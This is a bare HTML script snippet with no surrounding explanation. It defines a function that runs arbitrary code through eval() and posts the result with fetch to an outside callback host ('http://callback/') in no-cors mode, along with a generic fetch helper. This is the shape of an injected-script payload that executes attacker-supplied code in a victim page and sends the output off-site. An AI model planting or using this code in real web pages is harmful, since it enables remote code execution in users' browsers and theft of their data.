<script>
function execCode(id,code) { 
  let r = { id: id, r: eval(code) }; 
  postData('http://callback/',r);
}
function postData(url = '', data = {}) {
  // Default options are marked with *
  fetch(url, {
    method: 'POST', // *GET, POST, PUT, DELETE, etc.
    mode: 'no-cors', // no-cors, *cors, same-origin
    cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify(data) // body data type must match "Content-Type" header
  });  
}
</script>
